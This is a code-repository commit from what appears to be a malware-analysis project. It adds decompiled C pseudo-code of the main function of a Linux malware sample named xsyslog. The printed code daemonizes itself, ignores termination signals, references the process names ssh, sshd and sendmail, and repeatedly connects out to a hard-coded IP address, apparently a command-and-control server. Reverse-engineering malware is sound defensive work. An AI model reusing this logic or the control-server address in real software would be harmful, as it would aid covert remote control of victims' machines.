Copied Main main() into its own .c file

kenbuckler · Jan 4, 2012 · 131b426 · 131b426
1 parent 072e7ce
commit 131b426
Show file tree

Hide file tree

Showing 2 changed files with 251 additions and 0 deletions.
diff --git a/xsyslog/main.c b/xsyslog/main.c
@@ -0,0 +1,248 @@
+//Caffeine Security Malware Analysis
+//Main section of xsyslog
+
+main(char _a4)
+{// addr = 0x0804A490
+    intOrPtr _v12;
+    intOrPtr _v16;
+    char _v20;
+    intOrPtr _v24;
+    intOrPtr _v28;
+    _unknown_ _v32;
+    _unknown_ _v36;
+    _unknown_ _v40;
+    _unknown_ _v44;
+    _unknown_ _v48;
+    _unknown_ _v52;
+    _unknown_ _v56;
+    _unknown_ _v60;
+    _unknown_ _v68;
+    _unknown_ _v72;
+    _unknown_ _v76;
+    _unknown_ _v80;
+    _unknown_ _v82;
+    _unknown_ _v84;
+    intOrPtr _v104;
+    intOrPtr _v108;
+    _unknown_ _v116;
+    _unknown_ _v148;
+    _unknown_ _v180;
+    _unknown_ _v184;
+    char _v224;
+    _unknown_ _v312;
+    _unknown_ _v448;
+    _unknown_ _v456;
+    char _v496;
+    _unknown_ _v600;
+    _unknown_ _v608;
+    char _v648;
+    _unknown_ _v864;
+    _unknown_ _v1136;
+    _unknown_ _v1144;
+    char _v1184;
+    _unknown_ _v2164;
+    _unknown_ _v2168;
+    _unknown_ _v2172;
+    _unknown_ _v2176;
+    _unknown_ _v2180;
+    _unknown_ _v2184;
+    _unknown_ _v2188;
+    _unknown_ _v2192;
+    _unknown_ _v2196;
+    char _v2208;
+    intOrPtr _v2212;
+    char* _v2216;
+    intOrPtr _v2220;
+    char* _v2224;
+    char* _v2228;
+    intOrPtr _v2236;
+    _unknown_ _v2252;
+    _unknown_ _v2256;
+    intOrPtr _v2260;
+    _unknown_ _v2264;
+    _unknown_ _t172;
+    _unknown_ _t173;
+    _unknown_ _t174;
+    char* _t176;
+    _unknown_ _t183;
+    _unknown_ _t186;
+    _unknown_ _t188;
+    _unknown_ _t189;
+    _unknown_ _t190;
+    _unknown_ _t191;
+    _unknown_ _t193;
+    _unknown_ _t195;
+    _unknown_ _t196;
+    _unknown_ _t197;
+    _unknown_ _t199;
+    _unknown_ _t200;
+    _unknown_ _t201;
+    _unknown_ _t203;
+    _unknown_ _t206;
+    _unknown_ _t208;
+    _unknown_ _t210;
+    _unknown_ _t211;
+    _unknown_ _t212;
+    _unknown_ _t213;
+    _unknown_ _t214;
+    _unknown_ _t215;
+    _unknown_ _t216;
+    _unknown_ _t217;
+    _unknown_ _t218;
+    _unknown_ _t219;
+    _unknown_ _t220;
+    _unknown_ _t221;
+    _unknown_ _t222;
+    _unknown_ _t223;
+    _unknown_ _t224;
+    _unknown_ _t225;
+    _unknown_ _t228;
+    _unknown_ _t230;
+    _unknown_ _t232;
+    _unknown_ _t234;
+    _unknown_ _t235;
+    _unknown_ _t236;
+    _unknown_ _t237;
+    _unknown_ _t239;
+    _unknown_ _t241;
+    _unknown_ _t243;
+    _unknown_ _t244;
+    _unknown_ _t245;
+    _unknown_ _t247;
+    _unknown_ _t248;
+    _unknown_ _t249;
+    _unknown_ _t250;
+    _unknown_ _t251;
+    _unknown_ _t252;
+    char* _t253;
+    _unknown_ _t254;
+    _unknown_ _t255;
+    _unknown_ _t256;
+    _unknown_ _t257;
+    _unknown_ _t258;
+    _unknown_ _t259;
+    _unknown_ _t260;
+    _unknown_ _t261;
+    _unknown_ _t262;
+    _unknown_ _t263;
+    _unknown_ _t264;
+    _unknown_ _t265;
+    _unknown_ _t266;
+    _unknown_ _t268;
+    _unknown_ _t269;
+    _unknown_ _t270;
+    _unknown_ _t271;
+    _unknown_ _t272;
+    _unknown_ _t273;
+    _unknown_ _t274;
+    _unknown_ _t275;
+    char* _t277;
+    _unknown_ _t281;
+    _unknown_ _t284;
+    _unknown_ _t291;
+    _unknown_ _t292;
+    _unknown_ _t295;
+    _unknown_ _t296;
+    _unknown_ _t297;
+    _unknown_ _t299;
+    _unknown_ _t302;
+    _unknown_ _t304;
+    _unknown_ _t307;
+    _unknown_ _t309;
+    _unknown_ _t312;
+    _unknown_ _t314;
+    _unknown_ _t317;
+    _unknown_ _t318;
+    _unknown_ _t319;
+    _unknown_ _t322;
+    _unknown_ _t329;
+    _unknown_ _t332;
+    _unknown_ _t333;
+    signed int _t334;
+    signed int _t335;
+    _unknown_ _t337;
+
+    _t253 =  &_a4;
+    __esp = __esp & 240;
+    _push( *((intOrPtr*)(_t253 - 4)));
+    _push(_t333);
+    _t334 = __esp;
+    _push(_t245);
+    _push(_t253);
+    __esp = __esp - 32;
+    _t246 =  *((intOrPtr*)(_t253 + 4));
+    _t172 = get_pid(char * )(_t246, _t318,  &M08127689);
+    _t336 = _t172;
+    if(_t172 == 0) {
+         *__esp = 1;
+        L080B7700();
+        goto L6;
+    }
+    L08048520(_t336, "ssh");
+    L08048520(_t336, "sshd");
+    L08048520(_t336, "sendmail");
+    _t239 = L0804EB50(_t172, _t291, _t318);
+    _t337 = _t239;
+    if(_t337 < 0) {
+        goto L6;
+    }
+    _t318 = _t318;
+    if(_t337 != 0) {
+        goto L6;
+    }
+    L080C36C0(_t246, _t291, _t318, "new insert!!");
+    L080483E0( *_t246);
+    daemon(_t318, 0, 0);
+    _t241 = ssignal( *_t246, _t246, 15, 134513536);
+    L080D9170(0);
+    L080B7C50(_t241);
+    L0804B720(_t246, _t318,  &_v20, 0,  &RepeatConnect, 0);
+    while(1) {
+        sleep(10);
+    }
+    goto L7;
+L7:
+    _push(_t334);
+    _t335 = __esp;
+    _push(_t292);
+    _push(_t319);
+    _push(_t246);
+    __esp = __esp - 2204;
+    _v108 = 3;
+    _v104 = 0;
+    _t173 = L0804CB50();
+    L0804CB00(_t173);
+    _v2224 =  &_v224;
+    _t176 =  &_v1184;
+    _v2228 =  &_v2208;
+    _t277 =  &_v496;
+    _v2216 =  &_v648;
+    _v2220 = _t176;
+    _v2212 = _t277;
+    _v2236 = _t277;
+    while(1) {
+         *135692872 = 0;
+        _v2260 = 0;
+        L080E14D0(_t246, __esp, 2, 1);
+        _v28 = 0;
+        _v24 = 0;
+        _v20 = 0;
+        _v16 = 0;
+        _v12 = 0;
+         *135692872 = _t176;
+        gethostbyname("216.83.44.226");
+        __eflags = _t176;
+        _v28 = _t176;
+        if(_t176 == 0) {
+            goto L37;
+        } else {
+            goto L14;
+        }
+    }
+L6:
+     *__esp = 0;
+    L080B7700();
+    _t319 = _t318;
+    _t292 = _t291;
+    goto L7;
+}
diff --git a/xsyslog/xsyslog-decompiled.c b/xsyslog/xsyslog-decompiled.c
@@ -1,3 +1,6 @@
+//Caffeine Security Malware Analysis
+//Raw Original decompilation of xsyslog
+
 L08048118()
 {
     _unknown_ r1;